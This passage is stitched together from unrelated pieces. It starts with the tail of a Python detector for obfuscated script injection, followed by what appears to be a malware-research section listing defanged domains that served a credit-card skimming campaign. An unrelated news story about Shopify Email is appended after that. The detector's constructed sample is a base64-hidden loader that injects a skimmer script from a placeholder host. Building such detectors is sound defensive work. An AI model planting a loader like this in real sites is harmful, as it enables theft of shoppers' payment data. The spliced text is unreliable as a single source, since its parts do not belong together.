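        host = (url.hostname or "").lower()
        # An empty scheme covers protocol-relative URLs such as //host/path.
        if host and url.scheme in ("", "http", "https") and host not in allowed_hosts:
            hits.append(host)
    return hits

def _b64(s):
    """Helper used only to build the constructed samples below."""
    return base64.b64encode(s.encode()).decode()

# Constructed samples; hosts are placeholders under the reserved .example TLD.
INJECTED = ('var e=document.createElement("script");e.src=atob("%s");'
            'document.head.appendChild(e);' % _b64("https://cdn.skimmer.example/top/aco.js"))
BENIGN = 'var cfg=JSON.parse(atob("%s"));' % _b64('{"theme":"dark"}')
SAME_SITE = 'i.src=atob("%s");' % _b64("https://shop.example/img/logo.png")

if __name__ == "__main__":
    for name, src in (("injected", INJECTED), ("benign", BENIGN), ("same-site", SAME_SITE)):
        print(name, suspicious_hosts(src, {"shop.example"}))
```

It only sees string literals passed directly to atob(), so a clean result is one signal to combine with file integrity monitoring rather than proof that a file is untouched.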

Domains Used by This Malware Campaign

Zendesk-chart[.]com was created on September 13, 2019, and it is now hosted on 185.254.121.64.

A quick lookup shows that the same server in Russia hosts the following domains:

jquery-web[.]com – Creation Date: 2019-01-21
jquery-stats[.]com – Creation Date: 2019-03-30
tracker-visitors[.]com – Creation Date: 2019-04-19
jquerycodemagento[.]com – Creation Date: 2019-08-11
gooqleadvstat[.]com – Creation Date: 2019-09-13
gooqlemgrteg[.]com – Creation Date: 2019-09-13
zendesk-chart[.]com – Creation Date: 2019-09-13
jquerystatic[.]com – Creation Date: 2019-09-13

All of these domains serve multiple versions of credit card stealers that can be found in the wild injected into various e-commerce sites.

hxxps://jquerycodemagento[.]com/my/jd.js
hxxps://jquery-stats[.]com/u/redacted.js
hxxp://jquery-web[.]com/wp/redacted.js
hxxps://tracker-visitors[.]com/my/jun.js
hxxps://gooqlemgrteg[.]com/ajax/jquery.js
hxxps://gooqleadvstat[.]com/ajax/maria.js
hxxps://jquerystatic[.]com/good/hard.js
…etc…

Mitigation Steps

What is evident is that this is definitely not a fully automated mass infection, where hackers have a unified solution (list of vulnerabilities and the payload) that fits all scenarios. Each script has been customized—both name and content—for each specific compromised site.

In this malware campaign, the checkout page URLs are detected for each target. From there, custom code works to collect sensitive credit card information from the victim’s checkout form.

The malware itself is CMS agnostic—it doesn’t matter whether the site is using Magento, WordPress, or any other type of e-commerce CMS. If there is a form that accepts payment details and it can be hacked, nothing prevents the bad actor from installing a skimmer there.

E-commerce website owners should take the security of their websites very seriously, since they are ultimately responsible for any customer data breaches resulting from transactions on their online stores. Extra attention should be paid to the hardening and monitoring of web pages and server resources. Perform regular security scans on your web assets to detect malware and other indicators of compromise.


Shopify expands into email marketing


Shopify continues to expand beyond its core e-commerce platform with a new product called Shopify Email.

Shopify’s chief product officer Craig Miller and director of product for marketing technology Michael Perry gave me a quick demo of the product yesterday; Miller argued that they’ve created “the first email product designed for e-commerce.”

That means it’s integrated with a merchant’s store on Shopify, allowing them to easily pull their brand assets into their emails, along with product content and listings. They also can see whether those emails actually lead customers to add products to their carts or purchase them. And they can create customer segments based on the data in Shopify.

“What we’re really proud of here is, we become the expert for them,” Perry said. “Most people we’ve surveyed don’t understand the value of segmentation, so we’ve taken the liberty of assembling the right list to add value for them.”

Shopify Email is currently available as an early access test for a limited group of merchants, ahead of a broader rollout next year. Miller said it will be free for these initial merchants, with general pricing to be announced later.

Other recent additions to Shopify’s product lineup include hardware for brick-and-mortar stores and digital ad tools.

“The common thread among all of [our new products] is to help brands sell directly to their customers,” Miller said. “There’s been a lot of talk lately about direct-to-consumer, but that’s something we’ve been doing for a decade and a half without calling it that.”